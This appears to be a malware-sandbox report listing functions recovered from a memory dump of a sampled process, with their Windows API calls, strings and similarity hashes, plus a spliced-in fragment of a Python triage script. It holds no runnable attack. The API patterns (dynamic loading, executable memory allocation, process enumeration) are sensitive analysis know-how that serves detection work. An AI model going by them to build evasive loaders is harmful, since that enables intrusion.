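• Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
Similarity
• API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
• String ID: @
• API String ID: 4150878124-2766056989
• Opcode ID: 993ce845054cc6aac15b634fa97031b84cd2860677b62181a1c74b11533c64c4
• Instruction Fuzzy Hash: 57413A7291121CBFDB24DFA4C985FDEB7B8EB45300F00419AFA45A7280DA716E65CBA1
"""

if __name__ == "__main__":
    for hit in triage(SAMPLE):
        print(hit)
```

Run it against the full text of the function listing rather than the sample to get every function that reaches the four cross-process APIs; the decoded OpenProcess access mask tells you at a glance whether a hit also asked for PROCESS_CREATE_THREAD, which the entry above did not.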
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 002F7A86
                                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 002F7A9A
                                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 002F7ABE
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                             • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$Window
                                                                            • String ID: SysMonthCal32
                                                                            • API String ID: 2326795674-1439706946
                                                                            • Opcode ID: 3a964c39a27ed1c1513641256c8a498d38d3f1aa9aaa47e1b225034d6dd9da63
                                                                            • Instruction ID: 49675034793ebb52aa105a98facb6893273ad8e60dce14f0635d7a73a8ff798e
                                                                            • Opcode Fuzzy Hash: 3a964c39a27ed1c1513641256c8a498d38d3f1aa9aaa47e1b225034d6dd9da63
                                                                            • Instruction Fuzzy Hash: 9A21B13262021DAFDF158F54CC82FEE7B69EB48754F120215FF156B190DAB1A8608B90
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 002F826F
                                                                            • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 002F827D
                                                                            • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 002F8284
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                             • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$DestroyWindow
                                                                            • String ID: msctls_updown32
                                                                            • API String ID: 4014797782-2298589950
                                                                            • Opcode ID: bb7973cd36227d72d76afb4266c05b70639483237ff6deadf179db2849a48406
                                                                            • Instruction ID: b68c5a6bd739f7d01761d374640d7b1502c4c0233bf17767fd498071c83f2118
                                                                            • Opcode Fuzzy Hash: bb7973cd36227d72d76afb4266c05b70639483237ff6deadf179db2849a48406
                                                                            • Instruction Fuzzy Hash: F6216DB5614209AFDB11DF58CCC5DB7B7ADEB4A394F080159FA059B251CB71EC21CAA0
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 002F7360
                                                                            • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 002F7370
                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 002F7395
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                             • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$MoveWindow
                                                                            • String ID: Listbox
                                                                            • API String ID: 3315199576-2633736733
                                                                            • Opcode ID: b975cbe0002b84e1d29ca5e06229649894e6f7937c4f638297f48378dfc27979
                                                                            • Instruction ID: fd1e723fd12f916d744b59198e8e0caf2b51081b9772ee414fba18341b7fd543
                                                                            • Opcode Fuzzy Hash: b975cbe0002b84e1d29ca5e06229649894e6f7937c4f638297f48378dfc27979
                                                                            • Instruction Fuzzy Hash: 1021D03262411DBFDF128F54CC85FBF77AAEB89794F018124FE049B190C671AC219BA0
                                                                            APIs
                                                                            • GetWindowTextLengthW.USER32(00000000), ref: 002F6FC7
                                                                            • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 002F6FD6
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                             • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: LengthMessageSendTextWindow
                                                                            • String ID: ICTRLCREATEICON$edit
                                                                            • API String ID: 2978978980-3293527457
                                                                            • Opcode ID: 10a334e5e32fe7493ec131c4920db2ded508490461b385e06a60ef1f4cedf17d
                                                                            • Instruction ID: ebea005335e6a2943186483b070c9646c2a3f404d469ac57c2d1dfb9b07876d3
                                                                            • Opcode Fuzzy Hash: 10a334e5e32fe7493ec131c4920db2ded508490461b385e06a60ef1f4cedf17d
                                                                            • Instruction Fuzzy Hash: 4711607112120DAFEB114E64EC98EFB7B6AEB053A4F504724FA66935D0C771DC609B60
                                                                            APIs
                                                                              • Part of subcall function 002AB544: _memset.LIBCMT ref: 002AB551
                                                                              • Part of subcall function 00290B74: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,002AB520,?,?,?,0027100A), ref: 00290B79
                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,0027100A), ref: 002AB524
                                                                            • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0027100A), ref: 002AB533
                                                                            Strings
                                                                            • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 002AB52E
                                                                            • =1, xrefs: 002AB514
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                             • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                                            • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule$=1
                                                                            • API String ID: 3158253471-2775356207
                                                                            • Opcode ID: 5ee21d0c1594173840f81fc9209bb8f7587467788307d764fab3ae29c130b3a6
                                                                            • Instruction ID: 845b69b790b7e2f973a2daaf5514a07ffd7f86868e70fd6176030bc3a861ab81
                                                                            • Opcode Fuzzy Hash: 5ee21d0c1594173840f81fc9209bb8f7587467788307d764fab3ae29c130b3a6
                                                                            • Instruction Fuzzy Hash: A3E092B06103118FD336AF35E455B467BE8AF04304F00895EE446C2741DBB4E554CF91
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,002B027A,?), ref: 002EC6E7
                                                                            • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 002EC6F9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                             • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                            • API String ID: 2574300362-1816364905
                                                                            • Opcode ID: c776012907f881e7172274429b1a67f5de7e6ba8540e345a7e22f528ef94e908
                                                                            • Instruction ID: ae443ed7a5823759c01b3c3752f7dcfa321f88e1fef52e0579dfdb0ffc380f50
                                                                            • Opcode Fuzzy Hash: c776012907f881e7172274429b1a67f5de7e6ba8540e345a7e22f528ef94e908
                                                                            • Instruction Fuzzy Hash: C2E08C381617538BD7264F6AC85AB82B6DCAB08724FA0842AE885D2250D770C840CB50
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,00284B44,?,002849D4,?,?,002827AF,?,00000001), ref: 00284B85
                                                                            • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00284B97
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                             • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                            • API String ID: 2574300362-3689287502
                                                                            • Opcode ID: affb8f316d8fa1bc817c795c3778fe0b5610d9383c65007537fcbf4ec0493212
                                                                            • Instruction ID: cde367991023619c519db73213071c821bb2c2b9aeee5396c7049a1b70631d71
                                                                            • Opcode Fuzzy Hash: affb8f316d8fa1bc817c795c3778fe0b5610d9383c65007537fcbf4ec0493212
                                                                            • Instruction Fuzzy Hash: CFD012789167139FD725AF35DC2874676D8AF05355F11882BD4C6E2590E770D490C750
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,00284AF7,?), ref: 00284BB8
                                                                            • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00284BCA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                             • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                                                            • API String ID: 2574300362-1355242751
                                                                            • Opcode ID: 635c8aacc1346800caa77894036d9effb599273accc5e42f529f88d30070403f
                                                                            • Instruction ID: c5de28261b0cd4527fbf50f27610531356bcc5d76ec07801334b7bae5127eeec
                                                                            • Opcode Fuzzy Hash: 635c8aacc1346800caa77894036d9effb599273accc5e42f529f88d30070403f
                                                                            • Instruction Fuzzy Hash: 12D0C2388113138FE3256F30DC1874672D8AF04340F008C2BD4C2D2590DB70D490C700
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(advapi32.dll,?,002F1696), ref: 002F1455
                                                                            • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 002F1467
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                             • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: RegDeleteKeyExW$advapi32.dll
                                                                            • API String ID: 2574300362-4033151799
                                                                            • Opcode ID: ec6c8f6e3297a62589377902a8062b8be9f3b5a8b94b50a6236280edd4f71b2f
                                                                            • Instruction ID: 44aec5d7097620a0757dfbe09d1c163de93cf75da1d58bdb5309eaf3b7eccbca
                                                                            • Opcode Fuzzy Hash: ec6c8f6e3297a62589377902a8062b8be9f3b5a8b94b50a6236280edd4f71b2f
                                                                            • Instruction Fuzzy Hash: 20D0C730421327CFD7268F30D80834AB2E8AF06381F10C83AD4D2E2160EA70E8E0CA00
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,00285E3D), ref: 002855FE
                                                                            • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00285610
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                             • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: GetNativeSystemInfo$kernel32.dll
                                                                            • API String ID: 2574300362-192647395
                                                                            • Opcode ID: 9aac493c531bed0920f6ffc0fe9746d4aa60e057de52f3299b2f1b36d871beb8
                                                                            • Instruction ID: 98e2e52d68fc7b661afc4d99e4a27dc5ba1be5207fba976e99eae855e247256d
                                                                            • Opcode Fuzzy Hash: 9aac493c531bed0920f6ffc0fe9746d4aa60e057de52f3299b2f1b36d871beb8
                                                                            • Instruction Fuzzy Hash: 00D01278962723CFD7295F35C81875676D9AF05355F11882AD4C6D21E1E770C480C750
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(kernel32.dll,00000001,002E93DE,?,00300980), ref: 002E97D8
                                                                            • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 002E97EA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                             • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: AddressLibraryLoadProc
                                                                            • String ID: GetModuleHandleExW$kernel32.dll
                                                                            • API String ID: 2574300362-199464113
                                                                            • Opcode ID: 859a1019bd7887d5edaccd996a55887236f62e650813833fb36d32c23f3f05b7
                                                                            • Instruction ID: fb3d67bab7194e7367c78a236832cc0bc5e1f3d14b53028e912d6f95735dc74e
                                                                            • Opcode Fuzzy Hash: 859a1019bd7887d5edaccd996a55887236f62e650813833fb36d32c23f3f05b7
                                                                            • Instruction Fuzzy Hash: BBD012745617238FD7255F36D898746B6D8AF05391F11882BD8C6E2160DB70D4C0C651
                                                                            APIs
                                                                            • CharLowerBuffW.USER32(?,?), ref: 002EE7A7
                                                                            • CharLowerBuffW.USER32(?,?), ref: 002EE7EA
                                                                              • Part of subcall function 002EDE8E: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 002EDEAE
                                                                            • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 002EE9EA
                                                                            • _memmove.LIBCMT ref: 002EE9FD
                                                                            Memory Dump Source
                                                                            • Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
                                                                             • Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
                                                                             • Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_29_2_270000_Carter.jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharLower$AllocVirtual_memmove
                                                                            • String ID:
                                                                            • API String ID: 3659485706-0
                                                                            • Opcode ID: 533be52f519523cf6c10a258858f7c67bf6f18e690de3b286e75fafc6f25c600
                                                                            • Instruction ID: 93d0ceb3866673ffffab2a83362f1daa7df3ec71bef790170b54b30a3b94d27f
                                                                            • Opcode Fuzzy Hash: 533be52f519523cf6c10a258858f7c67bf6f18e690de3b286e75fafc6f25c600
                                                                            • Instruction Fuzzy Hash: 46C17971A283418FCB14DF29C48096ABBE4FF89714F05896EF8999B351D731E916CF82
APIs
• CoInitialize.OLE32(00000000), ref: 002E87AD
• CoUninitialize.OLE32 ref: 002E87B8
  • Part of subcall function 002FDF09: CoCreateInstance.OLE32(00000018,00000000,00000005,00000028,?,?,?,?,?,00000000,00000000,00000000,?,002E8A0E,?,00000000), ref: 002FDF71
• VariantInit.OLEAUT32(?), ref: 002E87C3
• VariantClear.OLEAUT32(?), ref: 002E8A94
Memory Dump Source
• Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
• Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_270000_Carter.jbxd
Similarity
• API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
• String ID:
• API String ID: 780911581-0
• Opcode ID: 1c9a6dee0d368afd047114105d98614d6a86de11d7b90e1774261d8f39b30f77
• Instruction ID: 3771f4fd1c3deaa9078a593151e4eef5013ace236fd30b871e537c6a837add00
• Opcode Fuzzy Hash: 1c9a6dee0d368afd047114105d98614d6a86de11d7b90e1774261d8f39b30f77
• Instruction Fuzzy Hash: B8A15775664B419FD710EF15C481B2AB7E4BF88314F448859F98A9B3A2CB70ED20CF92
APIs
• ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00303C4C,?), ref: 002C8308
• CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00303C4C,?), ref: 002C8320
• CLSIDFromProgID.OLE32(?,?,00000000,00300988,000000FF,?,00000000,00000800,00000000,?,00303C4C,?), ref: 002C8345
• _memcmp.LIBCMT ref: 002C8366
Memory Dump Source
• Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
• Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_270000_Carter.jbxd
Similarity
• API ID: FromProg$FreeTask_memcmp
• String ID:
• API String ID: 314563124-0
• Opcode ID: 27d75b7933ef97e085ebb8501feb51aa5659950e5146a7d0990a9a9fbda185e1
• Instruction ID: 6871d54c4beb13241e77dcb845f3afa6293519c52e02f157800173e8cdbb4c60
• Opcode Fuzzy Hash: 27d75b7933ef97e085ebb8501feb51aa5659950e5146a7d0990a9a9fbda185e1
• Instruction Fuzzy Hash: C8814E75A10109EFCB04DFD4C888EEEB7B9FF89315F108599E506AB250DB71AE06CB60
APIs
Memory Dump Source
• Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
• Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_270000_Carter.jbxd
Similarity
• API ID: Variant$AllocClearCopyInitString
• String ID:
• API String ID: 2808897238-0
• Opcode ID: a766374ef1f29304c8e81579d1be711c68ebfaaf6dd8581e9380b63657bcc197
• Instruction ID: bab56d559d9ac925d066fe646f8d2ad32956013fbfae3e637e221496a3d203bc
• Opcode Fuzzy Hash: a766374ef1f29304c8e81579d1be711c68ebfaaf6dd8581e9380b63657bcc197
• Instruction Fuzzy Hash: 5C51B730638B029ADB249F79D895F2DF7E9AF44310F30891FE54AC76A1EB7098608F05
APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 002EF526
• Process32FirstW.KERNEL32(00000000,?), ref: 002EF534
  • Part of subcall function 00281A36: _memmove.LIBCMT ref: 00281A77
• Process32NextW.KERNEL32(00000000,?), ref: 002EF5F4
• CloseHandle.KERNEL32(00000000,?,?,?), ref: 002EF603
Memory Dump Source
• Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
• Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_270000_Carter.jbxd
Similarity
• API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
• String ID:
• API String ID: 2576544623-0
• Opcode ID: 70cb370201b281a246ec1e20c78f6f6562a43ecd692b23f90c9ad9cd4409c10f
• Instruction ID: 628a8faa631b28fe9b4afd3921506946170d290f9e78bc42c08fc55c85b7d321
• Opcode Fuzzy Hash: 70cb370201b281a246ec1e20c78f6f6562a43ecd692b23f90c9ad9cd4409c10f
• Instruction Fuzzy Hash: 6B518DB11143519FD324EF24D881E6BB7E8EF94700F40492DF595972A1EB70A925CF92
APIs
Memory Dump Source
• Source File: 0000001D.00000002.3850090574.0000000000271000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00270000, based on PE: true
• Associated: 0000001D.00000002.3850032159.0000000000270000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850230256.0000000000300000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850230256.0000000000326000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850379688.0000000000330000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_29_2_270000_Carter.jbxd
Similarity
• API ID: __flsbuf__flush__getptd_noexit__write_memmove
• String ID:
• API String ID: 2782032738-0
• Opcode ID: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
• Instruction ID: 5e42f456ee7bd18b6e82158b62326f168d541c4b7ab8c83563674ed7a0c13900
• Opcode Fuzzy Hash: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
• Instruction Fuzzy Hash: F541E9317207079BEF28EF69C8A0D6F77A5AF45360B24813DE859C7640E770DD628B44
APIs
• SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 002CA68A
• __itow.LIBCMT ref: 002CA6BB
  • Part of subcall function 002CA90B: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 002CA976
• SendMessageW.USER32(?,0000110A,00000001,?), ref: 002CA724
• __itow.LIBCMT ref: 002CA77B
Memory Dump Source
